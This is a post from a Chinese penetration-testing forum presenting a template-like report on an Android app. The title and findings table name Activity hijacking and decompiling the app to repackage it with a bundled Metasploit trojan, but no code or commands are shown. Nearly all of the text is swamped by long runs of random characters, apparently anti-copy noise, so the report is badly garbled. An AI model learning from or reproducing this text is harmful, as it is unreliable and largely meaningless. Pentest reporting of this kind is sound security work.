找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4105|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
+ U- `4 K9 C% ^* d- d * ]' t8 b* X- T" L! E

; e$ l1 E, {) G8 u7 k7 O- [ 1 R. G t E) m' q# a
9 b: g8 n) i; U* t* @& t 6 Y( q( T' \ R& Y0 _# Q

- i* M0 M* A5 S - @9 T, B6 S$ U& B3 \* N
! R U: l+ ?$ g * v; G$ l' }3 u9 l4 x( J/ Z

& s; h; N4 T& C1 v* k8 S4 x0 T$ u & L9 s1 {2 k% j3 v 文档编号:                ! }$ Y7 T0 S8 a0 Z* F0 ]" F 8 I4 K1 \; L4 B# m

2 Z0 p* z4 @7 J: t( R! Q% e& Y* Z: O

7 P' |0 o! H. `6 Y- L $ [6 a/ X9 P4 i   8 X& K& ?6 q J1 d8 R' u1 j9 _1 s4 N# }* ^

+ }! r8 C- B9 r ]' [1 F$ y / P/ {/ C6 Z }. w; ?2 u c

1 y/ S; W8 I) q/ F( y" t* F% C5 K$ i   4 W" g9 [8 [9 O ?$ b5 A( ^5 O: B& M4 l3 i6 |4 {) z

' r+ J8 p9 [$ ?0 c9 Q# j" ]; x. {; \, ?) X

5 \/ L$ Y6 i% Z" w. b 6 v8 o4 Q9 Z' ~& e$ q/ N, n   + h9 T" `+ f5 }2 r: }& p# v5 w' O( {0 t* N

) ~& T0 c* F# } [" {' @/ S ! `; v$ h/ e" k9 `

: D1 g2 g- _" d$ n" ^ + V; d1 q5 P. ]" D2 Q" a; E   " m8 T, |$ b* ]' @7 g- `9 y5 ?7 D! g% S2 T/ L) C' W

) [/ x" x7 v/ w( n; E) T 2 K6 `2 g# j. t$ V' [

3 p8 v. Y+ i. E ; ?8 N2 k' z: q# V7 c; p* e   1 q0 B& \* g+ G3 S% [ & z( R. _' v4 w( r. y0 [: C

5 t6 p' w3 X3 W2 T, h) ]0 x5 n" ~) {% v% {

: G7 U$ @7 v9 j, L( M# W4 x ) r$ V: X. S3 ?: f( J 某某某APP渗透测试 ! g5 q5 u+ }' ~0 J0 u7 K6 L4 w9 B2 e: F: I7 n. X4 |( }8 v; V

1 x' d& X( c1 E1 }8 d3 R 4 B z1 [! i+ V- }9 u

) I0 [1 S. \+ ^* @, Y2 A, A 9 P3 C0 _3 q1 s3 D   : ?: z& \% d c& u* P- C2 l7 r+ s% L

3 V V( _! J- Q5 h , I) C; ~5 d5 M# q* D- r# D6 Z. N

, O ?1 m. t# ~! M# X - I8 j5 B) q9 P- A' S/ H* {   3 G @ m; Y7 r% m' {3 i" G6 y$ ]8 k$ [! P3 }5 M

! ?9 o9 _- V) A0 U. u# x+ E) _- Z' Z9 }+ K x% H

* I% J7 v6 u. e. o8 T/ k' _4 ? 1 d U0 V( G! m7 T" g6 @6 }5 D   ! J) y! o; T; @( ?1 D W/ }# s 1 A5 `% e/ y. Q: W

7 j: A6 k- i( c$ U1 q% u& F! S, m- S& w) O( ?: G# m

P* _# Y8 u) [3 ^! ?. C. b' Z/ p& p 5 P* ^5 z, e5 |( @0 k5 `   0 ]$ V) q$ n6 u, v1 {6 K( H/ m4 U4 I , B% x5 b& y" X

% j: w" O# J2 o6 K5 z/ K. }7 \) F( n0 F

$ n7 j3 }7 j+ z: E9 Z, x; v* P & a& \2 \. _/ y, M5 F 技 术 报 告 j4 G7 b7 T; I 3 r) S# e* q, x) b+ r9 |1 \. z" }3 ?

' B8 e& W% [$ s! L2 J+ Q ; w& U9 @% q: H! ?0 F

; z! G( g- P6 P+ u! ?/ M 4 V: X, y) I4 r& d3 R B- ^) t0 d   / I6 z! i8 c$ {8 E. Q# a& y+ ^* N/ v & t$ Z: m- K% f; I9 T

$ s; }/ [. @$ A8 K9 c1 K( y 8 ^- ^- l8 j4 r- S

+ t T7 [5 X" c4 `# z% b " t* `# i: |, ^- R   6 D5 y* }1 W& R& A+ A6 \# x1 E+ W$ j1 G/ S

+ ?% |# u- C) m8 N8 b/ }- e# d 1 Y5 `/ b. C. w/ t( R

# i1 X2 K8 `& _1 M9 s* d 7 [: j4 `/ A4 s   . u- p9 c( R9 y- ]3 H6 u# Q 6 w7 X( r# Z. }2 R" Z+ @

' J! {$ Y( Q5 q) [ # f' _# u; a- ?7 u6 X

( _, _+ E% w4 U+ ~, J! \. N ! f% N) l* T9 J x, ^4 ?   X5 r0 u: ^ c2 |8 i M. Q # }# o, i& |' E3 Y

# b. L* y3 W; R) C; M 3 x- h# e6 S" v- e' M: S' t: g

3 b9 f, ^" Y- p; _8 }# G9 q/ Z+ h# e. V) _1 K G0 J8 {   ' d z6 c. r' e( }# z, F+ ^* n . f1 N. M5 R5 k6 [- ^' i U2 ~

: V- K1 `! e8 N5 @0 {6 O 7 Q# \- L% p9 T

: k& c2 S4 Y$ T' x) B 7 _$ B" Q, m, M# B   7 A! |3 C# Z# K6 w3 ^ d5 y2 p " N) c4 }8 Y# ~1 f4 L8 a! E

?' G" B( J: r3 p1 }" X3 n ( @$ |8 t& V# |; M7 P/ }! M# u

! ?# m; x, o' ^" q, M6 `% S7 b6 B6 Q- [7 o! q9 X   ; t: C v) R) }. y* u * S7 F: a. n& T# A- j0 K2 Y' I+ r

1 c+ x( E- s4 F3 {% Y, O 9 m6 n- g( ]8 B$ m7 S

' A( Y! T: A9 Z ]$ S0 V& U8 k- k & ]3 }$ U4 |, c6 X: [: }# K; P& x7 _) L/ j+ M   9 y! t) |) B9 j8 }; e; p) X" ~ 5 k. m" g6 N3 ], R; q

' W; C( B% u* T7 |* m1 P }) @/ Q$ y6 x

" N1 d1 R8 D0 w. L + C4 ^. y& l0 z$ O. K' _   9 |2 e# O# E, q0 ? $ B5 A. \0 x$ C( ]0 v

$ V3 @0 W4 j0 _2 b6 x+ `' d2 E 7 z. R5 F$ H0 e9 E4 p

; R5 v1 { H8 L* F9 }& _" X ! N R& d: U+ p+ C   5 W) |0 n1 x7 ~9 A: I9 h 9 s! Y* c* @2 k2 l- `5 G3 B; |

- [% `; @3 k. T; T; I+ ` T) q; R# l % w: T/ h2 `2 o! Z- C8 v! e

- A: C' c* Q4 Y3 z% H; } w; ^: j9 |+ b+ u3 z" c ` w R   ' J; I* Y8 d8 g" \; v$ { ) i, K2 r' j/ c% L

* h& ?/ N( K* U$ M9 o, `, r+ w9 N, z/ ] * v+ C+ `8 {: x# v

" h" l5 Z- y; I6 C- O5 i6 s 1 r; R% f# G" ~3 M' w8 e   ' a& Z. @! v9 Q% H" G " m/ o6 O0 @5 L) \9 l( n, t+ x1 ?+ S

2 Y; {8 e9 A% U) h1 R- n9 D 9 {0 e% L7 w: J7 n' p

3 N7 u1 t0 l7 T( K- I 4 N+ H# O" ]* W/ a/ y   * n# Z" ]% X" N5 X$ p8 Y* m* K4 X; M3 K, x, L. x8 b

) }& M, W9 `' t6 r9 K5 q7 a ! O1 z7 m# h" h8 z" q

, L: V8 z! K0 F# D- B9 D0 q" ? w9 j) T) ?0 i |   ) P$ N$ J9 h1 h6 B N6 E7 a6 z0 u8 J2 X6 X" T

N6 D; d8 ]& i7 x. M$ e# \- T6 f. H" c% F1 d9 k

) p3 O" X" ]; {0 D/ H v% d . J, b1 H8 j6 B+ s$ T   0 \5 u' b5 d5 |- b2 Y' ^! I) d / _$ Z$ H @8 i5 V( S+ e# ^, d2 u c

- m* F, ?" q8 W: K 1 r3 ~9 k: Y5 a+ Q+ L0 S! R

2 E+ G& F, Z2 y9 ]9 ?( ~) } : |8 ^+ S4 W8 m" y# C \0 _   / Z0 Z/ |# X. k # X- {% t6 D- L' @6 T$ S, K

2 R. v; F. S; X( M1 [( _3 y) E7 _, E7 u. T6 X$ a

. [: p& H }! q7 u B 8 Z8 k0 M# E6 |; M. a   ' R2 M" f2 G, Z , L! r! w0 b+ r2 W! Y% j

1 X; A: N: y8 v6 B! M! { 2 p! t8 G" `' w& e0 }* m/ H. E# P

. F# a" q( {( p) }9 g U7 ]4 L4 k5 j / q& a7 Q# q. D9 N" d4 \   7 j* X: A+ U7 \- w , L+ ~4 n& O4 b" Y4 r8 M4 ]" B

0 H4 l# c6 r5 F" `+ T" B ' b& W( A! i& j: j/ b

& X( F# [5 z+ }6 N$ V1 f * ^ h2 P5 a( ^1 C 二〇二〇年 $ p4 E+ k; h1 K- f" u1 G) ] r; o# y& i% G: w+ _

. X% z8 u! W- C$ s9 u- x" b' C* d + h; F3 D, p2 p; {' G
+ \, C( k$ _1 n; Y; {; |/ I0 Q 6 v; J. v( u/ i( T* X5 n7 ]
, L) _5 e+ b% o/ a# B8 _ - Y2 ]8 h" C1 L5 p + C- W9 t$ g: J) m9 A 9 `) r R; ]) r5 w4 e. X. w
7 G0 w# R! c: P1 } ^, y1 u, m: m; f3 y8 ^" S. T4 _
/ L! s. X) G7 N) s# v9 v" n% I1 o4 g3 d( ]" p
. k) ?1 n. P3 _2 o- k% b% n) z: X: G 6 Y3 D. w! r9 o) |* R8 W/ M) M4 A6 q1 ~; O2 q
- @; I$ C r1 a2 N# d: v$ C ) X$ L: S) V: T4 q: L3 \* _5 d! l

+ Y' R6 w" d) E$ w ) y1 v$ K8 `+ c5 l 目 录 . P4 e2 v6 E; T" ^/ u6 j9 t- u2 ]* Q0 r

; e4 i8 h/ \/ |8 t9 i9 {& a8 l/ H/ d5 L8 W4 K7 U* {7 D - \. Y. q" n5 g; u( i6 @0 P ! A! }+ K+ m) v; O

3 |& w( {! O$ F# ], ]+ n ( ^8 Z- R6 @) L9 D5 a   + G1 L& ?8 e& w* C. B6 m+ r - d/ a9 R6 A) C

2 q' }6 h4 g; G ; }0 f8 T6 p7 d0 I4 G1 i

1 q9 H1 R2 J7 O! z2 W# Y* |) Y5 c ; O, A4 t) x, b5 |0 d5 P" C/ p8 { 1 概述... 3 % j7 l4 |# J/ o/ Q9 Q ; z3 _3 O# p& P5 y3 M

2 Y! `1 e1 G+ T, n. W . Q; P& V; D$ k. h+ M8 Z

' [4 |) J( A9 x) N( C: }( c4 S4 x+ m- I 1.2测试时间... 3 - Y2 S4 w) V1 g s: Z7 _ ! A6 P% b+ f- J& _2 X! j

, g Y8 F+ _9 w $ }& u' a5 ], M/ t: M `3 y* [0 \

+ E1 S; E7 X; `# f& T" A& G3 N ! X- _/ x0 ]% a 1.3测试对象... 3 & H! N; b& r' M3 Y $ `' z6 K! a: ^

; w, ^9 h4 A) l2 l7 i4 A l: u4 R. V5 ^4 g# f

- G: G- G( t3 G* p! W! a+ \2 R; | * X5 ]. Z; @ j 1.4测试结果... 3 : o* w3 l8 {( d- G( i4 u& \ ; [. Q9 X' u* f' R+ F7 O O. h, z

0 v. Z- `, g7 Q/ O 8 C& T( T( Z b z

- j4 p4 r* x: F8 i- Q& A $ y# p+ c- H' h6 R 2 检测结果... 4 : L' d2 d' R, r3 D' p5 D- h- b. z6 P2 x# S' W7 D! |+ P6 {

4 M7 y8 d' Z$ U) s" l N4 L/ b9 |4 E1 b$ f1 e

' \4 O" H$ g B- {$ t. L6 B" a & d: I6 x. a% J. @" }* K$ h 2.1 某某某... 4 , X0 j+ n. ~8 Z; J) B' @7 x3 ?3 P% P & M" g9 r. E1 }

2 t# V- L8 N1 m& T/ G : Q& d6 w, c* n1 C; E! |9 X/ T

/ V7 h2 ~# R. P8 f5 h9 i8 b! ^4 n1 x- H, D( u& I. m 2.1.1检测目标... 4 ' U% Z p% C: b# s+ ?! E5 ^* b2 y3 p' m4 J E% q

! x. m: K8 \# A" B8 i( r* ]1 ^0 j2 ]6 I* b. ~

$ ^2 Q/ O$ B2 K: r+ t" Z4 u* i 3 x% x7 I1 e- }. j0 w 2.1.2检测结果... 4 3 ?3 `# ?/ T" f! G( n! D1 h! {) F 3 j: F! n1 C3 z# m/ l5 ]

7 y; W3 L; |0 x1 k' R8 A , j+ T' }3 p6 |0 o* M/ y

" `! R1 | m! g - I8 f+ U! m0 e' O- F7 C 2.1.2.1. 4 ; k: `4 N. G: K: r! f. F" ]/ O 8 m% H- l! }5 N; R5 X

5 ]( q$ a' p2 G3 T ; [/ I4 ]# `8 c* B, x% c- n. t

; ^& j& W3 E5 Z s0 [ - X) r" ~" F, c7 g& r 2.1.2.2. 6 + n; y- Y- `1 H) }/ w- k4 }7 P7 O; U

: i4 s1 ?8 b) X' r3 S2 Z% B 2 u5 E0 k+ }" W$ l

" p, F1 s* y* D, }1 O0 D+ I; }+ o/ F5 T8 O% f* i: ^ 8 y+ ~) s8 V& \/ G2 ]& n , Z- M% F9 a5 O& j

" ^7 ~+ h' {, O2 [! T2 W 9 Z( M k" Q* H. V6 B5 A 1 j' B, c, ~% z; b0 l7 d/ Q; @ , R# E6 n: C/ T/ H: B
" s, r7 J1 v7 w9 ?- b" O * x% h: ?% z4 c9 B
J; f; w3 k3 G# p( ^3 ~ 9 x$ ~5 K3 b8 f6 U" a ! g0 K, b% d( \# D. |0 q A 3 M: N1 p4 ]% {, @- i

% n R7 U4 d4 B. N' r$ n: p 6 y: u6 d0 f; @8 t 1 概述 ; `1 O* w8 o2 P# |7 O3 ` , F2 u# C7 s8 I, J% x, l1 i0 s

) ~7 c0 S' N) f# V; l 4 I1 `' s" f# W0 ?8 F2 q

$ {5 ` p! U! c; ?' I0 K 7 i% {8 J W8 v7 x5 {2 W 1.2测试时间 - [2 s% D$ Q7 J. }: g0 e# D* }" t0 ?: r7 i6 U1 O% o

1 `& b4 s5 g* n* ` g5 ^ Q. N* s ^8 R5 z, ? A; E5 m 6 B* ?1 G4 f$ k) `) x* N' s2 Q! R- U- L0 |, z, w# `3 ?1 z3 F" I8 \/ m5 k' x; C, ^& ^0 u3 U+ Q2 `0 k7 W' B+ V& d! W" \0 e3 Z- z/ Q A9 n$ N) L0 c" w/ E, E: a9 d2 l. P$ A8 ^" r& O. z. ~% {7 R. C" V8 K7 R' _! L" t1 y G" p' \/ D. s! R. D: B( [3 v# l3 T1 P& X0 u2 A, M6 e, l! f9 `: l8 i( r! X4 M6 @4 x, \8 p* G4 d! e3 L2 M6 d' K6 `! v, s# {! r. k2 o+ U; H4 ~6 c# k7 l+ Z8 s8 x$ U+ X9 a" `: k) g' N+ x$ P) D2 O# T/ x& r# H* f' I5 P" c! b6 ]4 f# N+ ^6 [: B* `! J& i6 {+ J* u, t3 ^$ Q4 }; q* S& }% h( I& {3 I* X) V% M9 d( R7 p2 w8 b q$ p& s' Y" Z7 z- U+ N1 x7 w7 X0 ?/ u8 O c. F" ]* g9 G& o& H- B# @6 \- Y1 h& T+ I- B- T8 b4 J( k# G" G6 m5 u
" D$ n' X! B# ^* i- K* f * p2 h! T+ ?" I7 T, B e' d

& T# |( ?5 u1 }. W9 l0 E) p/ X: T9 J$ o' ? 渗透测试时间 + D# [: P& a7 g; `8 z ' M1 \% `4 q# K1 P3 g4 j' s

% K8 P u. J% ]* C6 j6 J$ r( U3 y8 j% Q; m
; j5 p$ u; E7 K! G0 n( s0 a $ Z9 Y6 ?; z9 y' U/ G% I9 I+ T" e

) k2 D( H3 u1 @: ^/ z5 s, K & U0 S f7 ^( A( n C 起始时间 O2 k ~5 L: G% D* {: R' C/ ]1 y$ V+ q0 o2 K

0 k3 E# B; Z6 V1 o7 p6 D 6 a) e. I% h F4 Q, S r% \6 ~ 		9 F9 E+ g( y7 U J6 S7 {% g . ~0 d3 [2 `' |

* O: C6 C/ W: V" u0 n 9 ^6 T3 Y4 y: H2 Q( g0 I3 T) R 202046 6 P5 n4 C. N3 N! d. l+ ^4 L ( I5 @/ q8 U! c- T

' E! ^& [' ^7 @% ?" y# R* v$ v7 y5 _/ F5 c, i8 w% L# A* ]2 I: O( e
7 B- ~. q# ?, q: `* [6 F 4 [+ R7 v0 M3 h& j# k

@& j) P! R. i" P# ` ! e5 L0 f' r9 u6 r: N/ q 结束时间 , g4 O5 N1 }" r 4 b. }7 n& M, U9 V; k# r

8 `0 ~8 D( l: q , M# F- Y. V# H! r8 P& z3 y 		2 G; v# @7 {9 C; n- u; i2 P 3 x# u3 y$ M5 Y% `" l! K `1 E

# P0 k! m4 n9 L% e6 ]7 j 3 @/ i" _9 \9 @+ B7 h 202049 8 D+ ]* x* B6 H+ L 3 e7 e% L- u( U8 v

% P7 S, n% o# T1 t+ L, j5 u8 y1 R: R6 \ H: n8 t$ x
4 j6 d/ T7 }: W, j$ z. y& w$ J

3 |# n" T. V" U8 F " `9 _5 J# D' u) E8 z5 y 1.3测试对象 * [% ?1 N8 ~2 k* l5 g" i9 o* j6 ?, @% w) Q1 Y4 [2 C% y% ~8 S

' g7 P8 n: c& U) ?5 G % h/ S T3 c x

2 }9 w6 O$ q! j% l( }# z. U $ }9 J. j' f3 f* ]( x$ J7 o 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ) _; W6 Z6 G1 [ 9 {' }1 V/ @4 C* q9 x

# k9 F4 `% R3 f5 i7 ]$ ?) g; I. D + c4 o a. H2 @% \8 m( q

5 y) c8 \/ i6 O. j- ]* k9 c ) x6 U6 q* T& `7 c 1-1 检测对象 5 G! X7 n" z1 e& ^. X 1 R y+ U+ P7 C, G

8 g/ c2 D6 b" `) L) I# |0 T, j * Z# X; c u. J) L7 Z- i & T! d# L1 S6 @# |' V3 Q* Y) Z4 Y6 j+ j% q) \0 p4 D7 H. \5 l/ {4 v* O% J5 \5 i( k1 c& v# ]) z& D; u0 g. ?4 X! _, d8 _" H" [# E/ A3 p3 c$ T+ _/ {' w* p! S; c3 i, V' `, f0 |* }8 Z. e& Q9 p/ D6 o. i4 T; r F; k* a. W: S$ L& d' h9 I! k) D. g# R% X F! Z# Q3 f) ?7 n/ n' h- M0 r ~8 ]& q# U5 q+ C/ P0 {+ \. Q2 ]' E4 Y2 p( Z6 F" L3 A" B, Z2 J& ~- V1 T3 F+ H' u; [ e: J6 l; @, J% y& t0 v0 A6 F( T1 S$ Q6 I q" f3 x, B6 I( ~3 h8 _- y3 N* t, Q* v; M# y$ q5 M {( e0 W/ j/ h: a. Q3 v+ K- c7 M: O: ]4 Z, ?) v2 Y* Q2 q* h: d3 w% i8 J. |% C( V6 |% z) `9 G8 N0 D* d7 |/ D- _2 i' r" T# M: g& c' F( s% E/ X# n3 ?( P9 ^* Z% m0 I& O7 C/ W# _) U% }- q0 G$ @% D) `9 j/ G- F1 e0 V' A: E3 w/ c) x" ?- O% d; q: \: x8 f3 O, q# y( m0 y( k) q, ]! w; `3 z* A
! I7 S( d5 F2 {& S3 k1 l7 V+ j8 l: Z E2 v

' }) s! R* f" z" { B* W5 |( z 2 j# J& |. @: H- ?( w6 N* h 序号 0 ]0 S0 v- g- p: ^" r6 z% k9 Y; s# p% N

) A' z' w' i% F2 v2 C, T 8 \, t" ^; v2 X' U) W& ^( B 		- E8 ~. x( n. M* D& G& n / z0 |( d' |; |9 x7 o) `4 E- E5 j4 }

" y3 X" _+ F0 {" j $ J7 Q: ^8 B4 Z( N7 }2 T) D 测试对象 D# R- N5 l2 N' f( d H# P3 l; E: J' q: J/ g8 `

( d& a }1 e, A6 C1 Z: o1 Z) M * R1 @' y+ \# i* y 		/ ]" U% C0 b. M* U4 V& J + ~) d( f* h* s: @4 T% N) H

% |, _) v$ i1 w, ^& _# d: f4 C: ?* o 测试地址 & i- Y9 X" a' \$ n+ a ; {" d) i* g8 l8 E0 w4 E

/ R# c$ |6 t: E- C e( I4 u & a, m( ?5 q3 B2 a, k4 w/ d2 O 		2 Q3 x4 q, j6 D& O ! V; S( w; \1 n% E& T3 z9 g

; \) Q. _% p p- J3 e4 I2 X3 F4 Z2 P* M J5 H 安全漏洞 ( ~; X) \9 U& ]0 i0 f F/ a6 p" } B; q! l* x0 ^; W& L; |- q2 o

6 [3 r; E% I- u6 T6 O# Y + x9 P% o9 I, V& x, K/ k
R0 b+ U% K& i8 x 0 L3 @# L: T/ A" [0 ^" c3 K* `* M* H/ G% _; |

- `! b! D9 q1 u# ?* p( n. Y% l6 \& W4 D 0 V/ X$ N% y0 k# } 1 & ?/ \3 T+ F5 L2 _6 \& [ \5 Q : r9 i9 s2 `$ @ E% H/ O" Q. T

; R2 t9 L! P/ t! h( K9 q8 t& A @ 5 z& P* `# X( E. p" c3 f 		' O7 |1 D0 A2 Y0 Q; W! y! t & ]0 r" X1 q+ f* V6 t; _ Z+ K* a

# c( B) z9 a2 F7 f: D: ]6 ] : b; z1 r! ?0 \7 B3 \. { 某某某安卓APP + h+ C9 B9 \! Q: [2 y8 v + Q, T- u- p8 [1 b) }1 z3 h" w% p

% z2 M: @: a$ Y! n/ Y% | 0 Q( s$ J' {* D- F. O+ Q4 K 		5 C8 h% }& M0 g % Q: `2 p8 h, S

% N1 D- z! j. P9 E2 }/ U$ x ' [/ F$ R, ^2 k7 V( R2 Z0 l* W; g   O7 l. I- b! Q2 [, n1 J& } , \; O. Y8 a' s6 k: D% R h2 v6 [

! J p) S: M2 v7 ]& P# s! r2 y 2 f9 `9 l! E! W9 Q$ L 		2 \" U7 _4 h. o5 @6 S; e ! n0 ?; g( x! e8 h6 k! Y

8 A! U8 T" D- c1 i6 l1 ^% ~ : n" G! H9 C4 x$ h# } 2 ) g# ?7 Q/ [8 M. |" f4 k- v# J8 m' [7 n# J6 F$ T3 ?3 @# e1 q

8 P3 f1 S5 I4 ~! y4 A } / }: X8 l1 F, D- Q) d9 c
6 ?. z& j& u, d ! ^' {& [- L4 K

+ A& n, V4 f/ r4 k' D . v. j+ K" `* b% { 1.4测试结果 3 r9 {# e) _6 H1 P. t . ^9 h, U2 V7 f0 W

: B; X5 D. m- o7 i! b * ^. |0 T9 X1 G- z+ t4 W: [8 s

& t+ I! J/ F" Z; Z* i$ J+ m( O 2 A( z/ `) H5 V 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 7 i9 B4 N7 [3 W9 X- L: U 8 A- A% A8 e9 s: y/ @

9 N" y7 u! o1 @# B8 K/ h( i- C ( R! L: D- u7 V0 X. E

0 l" m' B( A: N# l) C , A* y) \1 v' Z# G" u9 V   4 j# J( X. n0 N3 K: ~5 V: j: J& c 0 L9 g9 m; U! c: ]$ `5 ]( S% G8 F, A

% Z- @( ]8 R- Y" Y+ z - [5 W! Z0 t3 @/ P9 H
7 B# }* |% S7 ]9 [) X5 {- K2 S1 l J% I0 i ' b% R! _* S& }: u# ?! G3 P2 d5 w6 _. ^9 [1 F2 R( I6 @% J( }& G. C/ \. ?& L* [( R! d5 s& \; Q3 \9 B& e: E/ w) j( L. O- S: U& ]9 Y4 z. U- `2 v" U* S5 ]5 s5 U. Q: m0 t& z+ x+ V- ~ ^- U+ x+ a* M7 {& U/ q' S9 e/ ]8 t- s+ X& k( c- f) x+ g( |! o2 n% D$ Z9 I3 u# u* x1 B7 J( ]+ E5 R) O; k: S* O4 \/ c- B( U @5 ?4 o/ x7 m7 _7 G& H0 {* i7 |: t% p" d5 N* Y4 v. U% K! ~! H9 z2 a5 N0 M- p e9 ]0 a7 b% M- ]! X! \# h$ X% s, \) M' f' m' R R% ]7 i0 d8 P" e! G/ _6 F9 V, Q* i/ W7 `& M( A$ Z% P0 U6 B, O" b! Z" P0 W8 [% L1 M9 A/ C2 G9 t) `1 D- T2 z4 [5 w. n( a1 `" x P! U8 Q* N+ n- k$ t' G+ p7 a6 e: B! [, _; P3 `7 }7 j& t9 E3 i5 r' i% A* @- O( i0 m6 k. |0 s- C/ J$ \! N) n7 V3 v# [" Y6 g* R- Q8 r. X) g1 G5 m& A Z0 j" O+ @' ]. L' y3 x. N& I% i% j7 \5 I7 K0 t8 A5 Q" [) c e$ Z t" P2 H/ o' {. w- Z8 v8 N7 G a8 X" n- j2 i6 s/ Q- x/ S( P, x6 Z6 Q$ x6 s+ g; a* x' Z, K, n$ v% d" x3 v, w6 c9 z. O0 j5 N9 w5 ]1 L3 J% g# m, H8 g9 e2 J, q/ u6 y/ a7 J1 d5 V+ u7 B, `+ ^2 b8 K, a: Z% m+ k, w5 ?. d6 F0 C5 a& ~. Y8 Y# L! J/ P& b3 ~ V# V% b; P) F8 z( n4 b0 k" z2 r1 M, v$ s) W7 D8 p0 G. c* T4 e: M7 R% B: E, `" l H& l+ U. d U7 I' q% e! }5 d4 l) \9 n& E H5 Z% G" e5 Y3 P% F# a. g# n2 m, \. X& {2 g' V# Y% \6 Z8 R' ?5 v2 L% D7 m4 e7 o3 c# q
+ b( e9 A6 W2 q- o% M3 D4 M( i" M' u- H

" s! L. I9 d! ]# J) E0 n 2 V4 i: f, ]/ l' X0 s5 f2 g& w 序号 4 h5 |+ _1 U& K% k ! l; E3 @1 @6 p$ I2 F( J

2 y- V+ y. v( [, p2 G+ Y * G0 Z& S; _5 ~) B0 Q+ S1 t* D 		" D: O+ N8 \4 O# W $ m9 k( N; G w0 p, J1 W

: S' b/ ~4 B+ t7 X o9 M! B ( s/ o3 M' a( c4 ~$ |% @0 j/ d; E 系统名称 * K9 a: _! K+ f1 Y ; |9 B9 y, [. ~# t3 K5 P

: D* ]. j% P$ O; ?1 `+ M+ h) h5 _" w % Y5 D! j8 p1 ^7 Z 		" Q) ^5 q* n/ ^4 o* U( { " C6 u2 ?5 v2 f+ f2 q" j; y

8 W) k; f) D% F9 S: k: F6 O 3 T. U1 n; M4 d- D9 _, x! G2 m 漏洞名称 1 r6 d" J/ s/ {4 m- a: B , \$ }1 f7 M$ d9 p

* N% Z% ` v7 s% x' F- {1 J ( p1 G/ u' @# I. D" f3 _* N. Y1 S 		- U7 G7 Y' [0 Q3 {8 M. E1 I0 @ - k1 L0 ^! \5 R( \; w+ ~

/ c( P) r# i" }7 E" l4 Z - _) k5 A4 Q' y) A- f% {% } 漏洞危害 ) F/ q" I% g8 M+ ` # x2 a" c: k3 l% s2 Q0 J, ?

- H0 G& u) c7 I m0 I 3 q. V! A3 A+ B. `( ~ 		) T. d% ~6 S( u 1 Y) N( |( g* X# d0 _. q

/ o q5 @# g- S5 V8 C; y4 Q , T/ z7 W# x) S. c: @. f7 ? 修复结果 + G( N! q0 F; {5 {6 K3 U' i . `* e2 H, D1 b( q6 Q

; R, \& A) W5 I Q9 O ' q7 A& M b2 O
% H& \2 v& \$ ?; O . U. }, K4 m- o8 b' Q

. [& ^& ^# r: ~; N9 S I1 `; _ 3 | f+ U S; t) l) ` 1 ; S P0 `+ ]" T" n9 }5 e* Z3 u7 a/ i- s

1 ^4 W$ d/ O8 n6 z0 ` 0 F* ^8 D) x2 e 		( i8 Z$ J- n0 r( g; z: a) |9 g) J9 I' d/ ] [

}: S5 t1 O4 P) A; ~! ^ ; D- m0 E T' R 某某某某某某APP : ?0 j9 O: `& R& L" T1 h1 w : C5 k- g [0 D) I

5 w+ h# _ V* Z: f& W- [ ' j7 \3 I1 b% z" O% L* x! S1 z) }+ P 		0 a6 O$ `/ `& D6 d4 i $ y/ `- @ |/ T: L

$ t$ ?* C, E$ x* B2 }" x s+ v* e+ Q O; C6 Z Activity 劫持 ! {1 q# P2 r$ e% J/ x& n " R1 D: W$ B& e$ R8 E6 u

9 Z, }: e( L8 u* h0 o6 R. r' O& x3 _/ ^) m

9 }! }7 y4 d W; J5 ~9 r' S 6 c# F* G& Q+ ^ L   0 C) J1 N) ~/ f , d7 ^6 V E5 O& v) w6 g

! N) b U9 I i 0 _* y% F% o! K- J( l 		9 L- U- T M1 m2 \- r2 n( {6 T* K! ~' O; Z: ], [# N9 s- n+ {

D4 w% v B# a3 T" z; Y# V1 n8 I; @: {3 D7 ^; {2 S1 A6 n # B9 D+ n3 ~2 {7 @3 Q) m* w3 z7 _0 ~# l7 \

+ x6 j+ G. M4 Q4 T1 F ' U/ v6 ?- b' k! K 		- H$ b$ M/ A4 u3 a( A; { + L8 o# ]8 Z7 f

* L K' j+ R, j* {! S " g7 U# v2 G; t2 }. Q: g   0 s& @6 v) ]$ v4 n$ ^- M4 }/ {9 w& B" m! p( `+ s g

& T! j6 J) G7 r3 O7 k% `9 q : j( j k7 i1 [/ n0 ^ T3 ?
/ B4 S0 b6 g4 u' s. I& c / @$ k1 k6 \0 b! n2 A; \: P6 Y

( l0 X9 f- Y4 h2 @2 I, o- D 6 p/ M/ C4 n7 Q6 W. h2 t) b& P9 W 2 6 ]3 Z4 W* T ^7 g* p* t $ P6 y5 h$ T+ e, O$ Y" z

* _: u& s$ Y& n: l/ k3 n4 ^* W7 C, _$ Z) j0 [( s" m& e 		0 ? C8 t! F( x9 o+ X4 R( n7 k9 u. T$ X z

7 g/ F6 b4 ?% h! F5 J: x" C , `4 w5 i, J& } 某某某某某某APP % f1 O3 w0 P5 K 9 V- `# |; x* a- l1 P6 r

. N, N' f+ G9 Y }4 Z: O# ]0 U8 a* n0 O 		) ?, i0 \- G/ T8 u( R" E2 _' } 0 b" f& l* l( i$ R5 F

2 ~" J1 B7 b5 S8 w' [6 @ S 0 |( d% c, I& } 反编译二次打包捆绑木马、篡改APP代码 1 x& j$ b. l7 Y0 m1 h ; p% o _5 H. ?; ?

" l1 I2 T' P0 l0 U1 o5 I( g" W 6 C6 e( U" l6 Y8 O: y0 f( p 		3 _: r: w2 |& V( f$ W' ] 3 {' N8 L% p: T8 y0 O

( o, V2 I# x& v' F( a) w! K " ?, g: A4 t3 H& w ; v1 t' g2 ]' Q' z5 m% J* @8 s( z3 S0 l* }- o

